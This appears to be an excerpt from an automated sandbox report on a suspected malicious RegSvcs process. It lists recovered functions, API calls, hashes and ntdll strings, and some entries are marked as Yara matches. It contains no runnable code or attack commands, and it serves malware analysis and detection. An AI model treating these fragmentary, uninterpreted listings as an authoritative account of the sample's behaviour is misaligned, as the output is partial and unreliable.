                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                          • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                          • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                          • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3 41a630-41a661 call 41af60 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID: 6EA
                                                          • API String ID: 1279760036-1400015478
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 201 408308-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 210 40835c-40836e PostThreadMessageW 201->210 211 40838e-408392 201->211 212 408370-40838a call 40a480 210->212 213 40838d 210->213 212->213 213->211
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                          • Instruction ID: 3ad5dae182a485ddbeb7f5a480a9d39f63c17b8903bd479f2bd62391de7c6076
                                                          • Opcode Fuzzy Hash: 6595105a47c6e32083fd1fb8fa9394886835eb68bcf65f7233021ca1186f33b0
                                                          • Instruction Fuzzy Hash: C601B531A8032976EB21A6519C42FFF772C9F40F55F04415EFE04BA1C1D6B8690547EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 216 408310-40831f 217 408328-40835a call 41ca00 call 40acf0 call 414e50 216->217 218 408323 call 41be60 216->218 225 40835c-40836e PostThreadMessageW 217->225 226 40838e-408392 217->226 218->217 227 408370-40838a call 40a480 225->227 228 40838d 225->228 227->228 228->226
                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                          • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                          • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                          • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 258 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 261 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 267 41a6b0-41a6dc call 41af60 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6893ad1ff0b09ab5ded6986cc7a70d4836bc9f017eaade6908ad6907b589f490
                                                          • Instruction ID: f35058fb3e0eca0567f11708145e7cdb4a23cd3968f33c0a570972cb542fc60d
                                                          • Opcode Fuzzy Hash: 6893ad1ff0b09ab5ded6986cc7a70d4836bc9f017eaade6908ad6907b589f490
                                                          • Instruction Fuzzy Hash: 8AB09B719015C5C9DA11F7644608B1B790577E0701F55C063D3030657F4778C1D1E275
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 014B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: c97654a23deba5ac0dc08bafadce8b5237e137477e391b2b31f26c5feca029b7
                                                          • Instruction ID: dd225e802b25b71f14174ad378245140d261fc1d8e7c0e115f6730785933b9a7
                                                          • Opcode Fuzzy Hash: c97654a23deba5ac0dc08bafadce8b5237e137477e391b2b31f26c5feca029b7
                                                          • Instruction Fuzzy Hash: 81928F71604342ABE721DF29C880FABB7E8BB94754F14491EFA94D7270D7B0E845CB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01468620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Thread identifier, xrefs: 014A553A
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014A54CE
                                                          • Critical section address, xrefs: 014A5425, 014A54BC, 014A5534
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 014A5543
                                                          • Address of the debug info found in the active list., xrefs: 014A54AE, 014A54FA
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014A540A, 014A5496, 014A5519
                                                          • corrupted critical section, xrefs: 014A54C2
                                                          • undeleted critical section in freed memory, xrefs: 014A542B
                                                          • Critical section address., xrefs: 014A5502
                                                          • double initialized or corrupted critical section, xrefs: 014A5508
                                                          • Invalid debug info address of this critical section, xrefs: 014A54B6
                                                          • 8, xrefs: 014A52E3
                                                          • Critical section debug info address, xrefs: 014A541F, 014A552E
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014A54E2
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 2517e894f181e9506d3d0ce91acbf08a870647312333de09a87296dd8ce1d519
                                                          • Instruction ID: adc4de6e5c4c1be5c308a5eddd7f070bae32119ffe93db2509140af09452996a
                                                          • Opcode Fuzzy Hash: 2517e894f181e9506d3d0ce91acbf08a870647312333de09a87296dd8ce1d519
                                                          • Instruction Fuzzy Hash: 0D81CEB1A40359EFDB20CF9AC940BAEBBB5FB58704F65411BF504BB260D371A945CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 014A2409
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 014A261F
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014A24C0
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014A2498
                                                          • @, xrefs: 014A259B
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014A22E4
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 014A2412
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 014A2624
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 014A2602
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 014A2506
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014A25EB
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: ffff91b28ff25272201412b8cfc114881653171cae8991f7e34286b25920e3fd
                                                          • Instruction ID: b0e3cdfc28b0e7b777ac429db71dfcc598866fbc7b84486b406d89a0aca22f24
                                                          • Opcode Fuzzy Hash: ffff91b28ff25272201412b8cfc114881653171cae8991f7e34286b25920e3fd
                                                          • Instruction Fuzzy Hash: 78026FF1D00229ABDB21DB54CC80FDAB7B8AB64304F4141EBE60DA7261D7B09E85CF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 67c01c77e37ba979e17942c0e5b41928b0714502daf1cc3d29872c4fcf4101a0
                                                          • Instruction ID: 04921891b27b89282a6ef37c9c511cfcd20fc71b93f757b4bb2755a18b0fb013
                                                          • Opcode Fuzzy Hash: 67c01c77e37ba979e17942c0e5b41928b0714502daf1cc3d29872c4fcf4101a0
                                                          • Instruction Fuzzy Hash: CB51D2711043029BDB26CF198854BBBBBECEF94640F14492FE994C32A0E770D605C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: d4d56f8c0c8c865fb1fae65db2a8a95ad9c2443c329c27b7c639b054fecbbaf2
                                                          • Instruction ID: 162473c436fed44313ac3ec7f910fc481362a9c4894819396c5b497cb0019ed7
                                                          • Opcode Fuzzy Hash: d4d56f8c0c8c865fb1fae65db2a8a95ad9c2443c329c27b7c639b054fecbbaf2
                                                          • Instruction Fuzzy Hash: F0D1CD31600682DFDB22DF69C448AAABBF1FF5A611F18805EE4659B372C7B49981CF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • VerifierDebug, xrefs: 014B8CA5
                                                          • HandleTraces, xrefs: 014B8C8F
                                                          • VerifierFlags, xrefs: 014B8C50
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014B8A3D
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014B8A67
                                                          • VerifierDlls, xrefs: 014B8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 014B8B8F
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: 9ef7834cc52e53aa2abe47ff3fb2328ea135c9c35ceb49233b82cb432eab9999
                                                          • Instruction ID: def84bfdbd736f43332389472734a97d20ebf7d3b3d4aca39c8420e273902d38
                                                          • Opcode Fuzzy Hash: 9ef7834cc52e53aa2abe47ff3fb2328ea135c9c35ceb49233b82cb432eab9999
                                                          • Instruction Fuzzy Hash: 2D9122B2605313ABD322DF29C8C0BAB77ACAB66B14F45045FFA406F2B1D7709C0587A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          • Opcode ID: 329510177647b71282a02b8bbf0b2a0669c2950265575750c675289ac5e8c5ff
                                                          • Instruction ID: f1138726ce4022a88464f5a102e53caab3c8889bea6f61d51a35a9daa4146bbb
                                                          • Opcode Fuzzy Hash: 329510177647b71282a02b8bbf0b2a0669c2950265575750c675289ac5e8c5ff
                                                          • Instruction Fuzzy Hash: D3A23F74E056298FDF64CF19C9887AABBB5AF89314F1442EAD50DA7360D7349E86CF00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 18e58e55c92e387ea1131f7f4a1501e7dcea31d4f420eb7ff35677dfcdac8d27
                                                          • Instruction ID: daefe9059892e906967c4a44bc7958f1c95be875e7e37a62b276bce6ebcf84d1
                                                          • Opcode Fuzzy Hash: 18e58e55c92e387ea1131f7f4a1501e7dcea31d4f420eb7ff35677dfcdac8d27
                                                          • Instruction Fuzzy Hash: 33916832B003159BEB35DF19D844BAE7BA5BB61B18F5E012FE9106B3B1D7B45802C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01489A2A
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01489A11, 01489A3A
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01489A01
                                                          • apphelp.dll, xrefs: 01426496
                                                          • LdrpInitShimEngine, xrefs: 014899F4, 01489A07, 01489A30
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014899ED
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: e5fe3bf0312fc970714ca61769ecd3d78150796131b846673430e45543c32f76
                                                          • Instruction ID: d74a11ab1ec2f40baadb4214cadb4e5147d5d5984c449016f15e51b99df10fd1
                                                          • Opcode Fuzzy Hash: e5fe3bf0312fc970714ca61769ecd3d78150796131b846673430e45543c32f76
                                                          • Instruction Fuzzy Hash: 1951E3322087409FE720EF25D881FABB7E4FB94648F51091FF9969B270D670E944CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01462674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 014A219F
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 014A2178
                                                          • RtlGetAssemblyStorageRoot, xrefs: 014A2160, 014A219A, 014A21BA
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014A21BF
                                                          • SXS: %s() passed the empty activation context, xrefs: 014A2165
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 014A2180
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: 9c5f17eb06850637d032b24019038268919839696198cbc42df582f6cda9673c
                                                          • Instruction ID: b83945741ee39e67429cfad23ba28c34ee86f32e4d6d1ac9a107a0858b362d85
                                                          • Opcode Fuzzy Hash: 9c5f17eb06850637d032b24019038268919839696198cbc42df582f6cda9673c
                                                          • Instruction Fuzzy Hash: F5313736B4021577E7218A9A8C81F5B7A6CDBB4A85F06406FFA0467274D2B0AE01D7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0146C6C3
                                                          • Loading import redirection DLL: '%wZ', xrefs: 014A8170
                                                          • LdrpInitializeImportRedirection, xrefs: 014A8177, 014A81EB
                                                          • LdrpInitializeProcess, xrefs: 0146C6C4
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 014A8181, 014A81F5
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 014A81E5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 40e7f81506a3382a3b87c7c6b99abf47b25f2e5b9035102aa66c0b90e7c78d23
                                                          • Instruction ID: c256d4292078dd913814c2d66950422d09b165ac203f8709411593be105bb7bb
                                                          • Opcode Fuzzy Hash: 40e7f81506a3382a3b87c7c6b99abf47b25f2e5b9035102aa66c0b90e7c78d23
                                                          • Instruction Fuzzy Hash: F13104726443029BD320EF2AD985E2B77A5EFA4B14F05055EF9856B2B1E630ED04C7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0147096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 01472DF0: LdrInitializeThunk.NTDLL ref: 01472DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470BB6
